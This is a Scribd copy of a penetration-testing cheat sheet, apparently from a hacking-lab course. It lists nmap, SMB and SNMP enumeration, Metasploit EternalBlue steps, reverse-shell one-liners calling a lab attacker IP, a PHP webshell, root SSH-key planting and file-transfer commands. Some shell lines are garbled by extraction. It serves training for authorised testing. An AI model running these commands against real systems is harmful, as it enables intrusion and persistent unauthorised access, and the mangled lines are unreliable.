Scribd
Upload
98 views5 pages

Command Description General: Sudo Openvpn User - Ovpn

This document provides a summary of basic networking, system administration, and penetration testing tools and commands. It lists tools for connecting to VPNs and remote servers, managing terminal sessions, editing files, scanning systems, exploiting vulnerabilities, obtaining remote shells, escalating privileges, and transferring files. The tools covered include ifconfig, ssh, ftp, tmux, vim, nmap, netcat, smbclient, snmpwalk, gobuster, searchsploit, Metasploit, nc, linpeas, sudo, ssh-keygen, python HTTP server, wget, scp, and base64.

Uploaded by

Victor Montilla
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
98 views5 pages

Command Description General: Sudo Openvpn User - Ovpn

This document provides a summary of basic networking, system administration, and penetration testing tools and commands. It lists tools for connecting to VPNs and remote servers, managing terminal sessions, editing files, scanning systems, exploiting vulnerabilities, obtaining remote shells, escalating privileges, and transferring files. The tools covered include ifconfig, ssh, ftp, tmux, vim, nmap, netcat, smbclient, snmpwalk, gobuster, searchsploit, Metasploit, nc, linpeas, sudo, ssh-keygen, python HTTP server, wget, scp, and base64.

Uploaded by

Victor Montilla
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 5

Basic Tools

Command Description

General
sudo openvpn user.ovpn Connect to VPN

ifconfig/ip a Show our IP address


netstat -rn Show networks accessible via the VPN
ssh [email protected] SSH to a remote server
ftp 10.129.42.253 FTP to a remote server

tmux
tmux Start tmux
ctrl+b tmux: default prefix
prefix c tmux: new window
prefix 1 tmux: switch to window (1)
prefix shift+% tmux: split pane vertically
prefix shift+" tmux: split pane horizontally
prefix -> tmux: switch to the right pane

Vim
vim file vim: open file with vim
esc+i vim: enter insert mode
esc vim: back to normal mode
x vim: Cut character
dw vim: Cut word
dd vim: Cut full line
yw vim: Copy word
yy vim: Copy full line
p vim: Paste
:1 vim: Go to line number 1.
:w vim: Write the file 'i.e. save'
:q vim: Quit
:q! vim: Quit without saving
:wq vim: Write and quit

Pentesting

Command Description

Service Scanning
nmap 10.129.42.253 Run nmap on an IP
nmap -sV -sC -p- 10.129.42.253 Run an nmap script scan on an IP
locate scripts/citrix List various available nmap scripts
nmap --script smb-os-discovery.nse -p445 10.10.10.40 Run an nmap script on an IP
netcat 10.10.10.10 22 Grab banner of an open port
smbclient -N -L \\\\10.129.42.253 List SMB Shares
smbclient \\\\10.129.42.253\\users Connect to an SMB share
snmpwalk -v 2c -c public 10.129.42.253 1.3.6.1.2.1.1.5.0 Scan SNMP on an IP
onesixtyone -c dict.txt 10.129.42.254 Brute force SNMP secret string

Web Enumeration
gobuster dir -u http://10.10.10.121/ -w Run a directory scan on a website
/usr/share/dirb/wordlists/common.txt

gobuster dns -d inlanefreight.com -w Run a sub-domain scan on a


/usr/share/SecLists/Discovery/DNS/namelist.txt
website
curl -IL https://www.inlanefreight.com Grab website banner
whatweb 10.10.10.121 List details about the
webserver/certificates
curl 10.10.10.121/robots.txt List potential directories in robots.txt
ctrl+U View page source (in Firefox)

Public Exploits
searchsploit openssh 7.2 Search for public exploits for a web
application
msfconsole MSF: Start the Metasploit
Framework
search exploit eternalblue MSF: Search for public exploits in
MSF
use exploit/windows/smb/ms17_010_psexec MSF: Start using an MSF module
show options MSF: Show required options for an
MSF module
set RHOSTS 10.10.10.40 MSF: Set a value for an MSF
module option
check MSF: Test if the target server is
vulnerable
exploit MSF: Run the exploit on the target
server is vulnerable

Using Shells
nc -lvnp 1234 Start a nc listener on a local port
bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1' Send a reverse shell from the
remote server

`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\ /bin/sh -i 2>&1\

`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\ /bin/bash -i 2>&1\


nc 10.10.10.1 1234 Connect to a bind shell started on
the remote server
python -c 'import pty; pty.spawn("/bin/bash")' Upgrade shell TTY (1)

ctrl+z then stty raw -echo then fg then enter Upgrade shell TTY (2)
twice
echo "<?php system(\$_GET['cmd']);?>" > Create a webshell php file
/var/www/html/shell.php

curl http://SERVER_IP:PORT/shell.php?cmd=id Execute a command on an


uploaded webshell

Privilege Escalation
./linpeas.sh Run linpeas script to enumerate
remote server
sudo -l List available sudo privileges
sudo -u user /bin/echo Hello World! Run a command with sudo
sudo su - Switch to root user (if we have
access to sudo su)
sudo su user - Switch to a user (if we have access
to sudo su)
ssh-keygen -f key Create a new SSH key
echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> Add the generated public key to
/root/.ssh/authorized_keys
the user
ssh [email protected] -i key SSH to the server with the
generated private key

Transferring Files
python3 -m http.server 8000 Start a local webserver
wget http://10.10.14.1:8000/linpeas.sh Download a file on the remote
server from our local machine
curl http://10.10.14.1:8000/linenum.sh -o linenum.sh Download a file on the remote
server from our local machine
scp linenum.sh user@remotehost:/tmp/linenum.sh Transfer a file to the remote server
with scp (requires SSH access)
base64 shell -w 0 Convert a file to base64

`echo f0VMR...SNIO...InmDwU \ base64 -d > shell`


md5sum shell Check the file's md5sum to ensure it
converted correctly

You might also like